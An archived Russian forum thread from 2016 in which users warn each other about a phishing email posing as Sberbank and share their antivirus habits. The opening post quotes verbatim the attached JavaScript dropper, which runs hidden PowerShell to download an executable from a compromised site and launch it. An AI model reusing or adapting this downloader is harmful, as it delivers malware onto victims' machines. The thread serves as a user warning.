Форум на Kuban.ru (http://forums.kuban.ru/)
-   Женский вопрос (http://forums.kuban.ru/f1065/)
-   -   В вы давно проверялись на вирусы? (http://forums.kuban.ru/f1065/v_vy_davno_proveryalis-_na_virusy-7950750.html)

Marr 10.08.2016 17:18

В вы давно проверялись на вирусы?
 
Интересное письмо пришло с адреса [email]osipov.s@sbr.ru[/email]:


Уважаемый клиент!
ОАО "Сбербанк" желает Вам приятного дня.

Пожалуйста, внимание на счет в приложении.
По всем вопросам обращайтесь к нашим менеджерам.

С уважением

Павел Осипов.

Менеджер по работе с индивидуальными клиентами

---

приложен файл "выписка426.zip", где находится ява-скрипт следующего содержания:

var lidizzz = new ActiveXObject("shell.application");
lidizzz.ShellExecute("cmd.exe", "/c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://www.see21dale.com/wp-content/plugins/libravatar-replace/vipiska.exe','%APPDATA%.exe');Start-Process '%APPDATA%.exe'", "", "open", 0);
var CnQDSbuOWkzeHCF = 582724;


Что-то там скачивает из интернета и потом запускает. Корочи, будьте бдительны.

А вы часто вирусы ловите или всегда предохраняетесь? Какой антивирус стоит?

gasana 10.08.2016 17:20

я сообщения с незнакомых адресов с вложениями вообще не открываю никогда и сразу в спам посылаю.
п.с. стоит лицензионный аваст.

Marr 10.08.2016 17:24

Тут и адрес email выглядит правдоподобно: [email]osipov.s@sbr.ru[/email]:

Прям, как будто действительно из Сбербанка шлют.

gasana 10.08.2016 17:25

2-Marr >да хоть от самого медведева. с вложениями - сразу втопку.

ЁлкА ТигровАЯ 10.08.2016 17:26

Аваст
Я не открываю незнакомые ссылки
А сбер все шлет по смс

Stager 10.08.2016 17:28

0-Marr > KIS лицензия стоит. Вирусов не видел давно, даже не знаю просто их нет или благодаря антивирю?

Stager 10.08.2016 17:29

3-gasana > а если фотки шлют или доки? Что значит с вложениями в топку?

Marr 10.08.2016 17:30

Кстати, под этим вложением mail.ru как обычно написало "Вирусов нет. Проверено антивирусом Касперского" :)

gasana 10.08.2016 17:31

6-Стажер >сразу? не предупредив?)
я не про корпоративную почту есличо. а про личный ящик.

Stager 10.08.2016 17:38

8-gasana > ну и про личный ящик. Я открываю все что не опасно.
опасные вложения почтовик и сам блокирует и КИС блокирует и глазами отличаю.

И что значит сразу? Ну вот помнится фоткались на экскурсии, я оставил ящик просил фотки скинуть. Скинули. Ну было штук 12 писем с архивами 7z с jpg внутри, чего не открыть?
Другое дело если ярлык там или url файл или вовсе экзешник - тогда ясное дело запускать не надо :)

vikentiya 10.08.2016 17:44

0-никогда спам не открываю, удаляю.

gasana 10.08.2016 17:46

9-Стажер >по фразе в теме письма можно это определить даже его не открывая :-)

GolayaPravda 10.08.2016 17:47

Что-то стоит. Каждый месяц ввожу ключи.

simatic 10.08.2016 18:12

0-Marr >два дня назад сдал кровь из вены для проверки на инфекции.

GolayaPravda 10.08.2016 18:15

13-SIMATIC >серьёзно ты обеспокоен.

Sapho 10.08.2016 18:22

че то как-то подозрительно выглядит сообщение все равно. может позвонить им и спросить, возможно ли получить такое письмо?

nicksheff 10.08.2016 18:44

[quote=Marr;42702587]Тут и адрес email выглядит правдоподобно: [email]osipov.s@sbr.ru[/email]:[/quote]
У сбера адреса почты @sberbank.ru

ruhawawavi 10.08.2016 18:58

судя по dale.com/wp это либо массад либо ми-7 ))

F11 10.08.2016 19:06

[quote=Marr;42702540] Какой антивирус стоит? [/quote]
давно уже предлагается официальный бесплатный Касперский
есть масса бесплатных антивирусов - AVG и т.д.

Marr 10.08.2016 19:15

19-F11 > от запуска этого скрипта антивирус не спасет. Тем более, что касперский показывает - вируса внутри архива нет.

F11 10.08.2016 19:17

20-Marr > спасибо что предупредил

simatic 10.08.2016 20:00

14-ГолаяПравда > да вообще..

13й 10.08.2016 20:28

я презарватив одел на ноут

Veronika_S 10.08.2016 20:37

23- Думаешь поможет?!

13й 10.08.2016 20:48

24-Veronika_S >я не думаю, а знаю. В ай-ти сфере же работаю.

Veronika_S 11.08.2016 10:31

25- Вам их там выдают в неограниченном количестве?)))

13й 11.08.2016 10:40

26-Veronika_S >ага, прячем по карманам, для личного использования.

NoThanks 11.08.2016 11:33

баянище же :))

NoThanks 11.08.2016 11:34

2-Marr > посмотри домен.. sbr.ru - пустое имя.. на продажу..никакого отношения к сберу не имеет... элементарно же :)

АптекаУлицаФонарь 11.08.2016 11:47

Пользуюсь AVG, давно уже, нормально.

Colder 11.08.2016 13:04

Это не вирус. Никакой антивирус не поможет. Это самый обычный скрипт файл, который уже скачивает непонятно что с левого сайта и запускает с помощью оболочки PowerShell. Что сделает загруженный файл - бог весть. Реальная защита только одна: любое вложение проверять на свойства. Не веря никому. Хоть от самого Темнейшего мыло придет :-). Но доступно не каждому, да. Клевещут, что в DNC именно так и попались.

pens 11.08.2016 13:08

Нет личной почты на бесплатных серверах. А в корпоративную сомнительным письмам не прорваться.

13й 11.08.2016 13:31

31-Colder >похож на шифровальщик с именем vipiska.exe
Друг на работе пропустил подобное письмо и Каспер не помог. зашифровал он ему весь диск. За ключ попросили 15 т.р.

simatic 11.08.2016 13:33

На компе юзаю третий год симантек антивирус. Стоит не особо дорого, около тысячи в год. Вполне меня устраивает, никаких проблем за это время не было.
ЗЫ. Но я и по порносайтам не шляюсь, где шифровальщики обычно, гнездятся.

onetwo 11.08.2016 13:40

34-SIMATIC > Антивирус борется с вирусами, а со скриптом, который стартует сам пользователь можно бороться только ограничением пользовательских прав на доступ к файлам, либо созданием виртуальной машины вне локального доступа.

simatic 11.08.2016 13:51

35-BoiledEyeInTheRectum > да это понятно, но автор спросил про вирусы, я ответил )

ЗЫ. Для потенциально опасных сайтов типа зайцев.нет и иже с ним использую параллельно установленный на ноуте Линукс.

Ginger 11.08.2016 18:59

Купил планшет а в нем оказался вшитый вирус (
Придётся сдать в магазин... Чувствую мороки будет много.(((
В общем интернет растёт развивается и потребители интернета это всего лишь ходячие кошельки... Так что чегото хорошего от интернета ждать глупо...

Marr 11.08.2016 19:08

37-Ginger > а что за планшет такой с вирусом?

Ginger 11.08.2016 19:34

38-Marr >TEXET X-pad... Дешевенький конечно, но все равно такая подлянка как вшитый в базовую прогу вирус это уже перебор... Вирус не особо зловредный, просто регулярно вывешивает банеры приглашающие на платные сайты. Раздражает (

Marr 11.08.2016 20:01

39-Ginger > может быть вы как-то подхватили этот вирус и он заразил базовую прогу? Или по отзывам у многих такие проблемы?


Текущее время: 17:29. Часовой пояс GMT +3.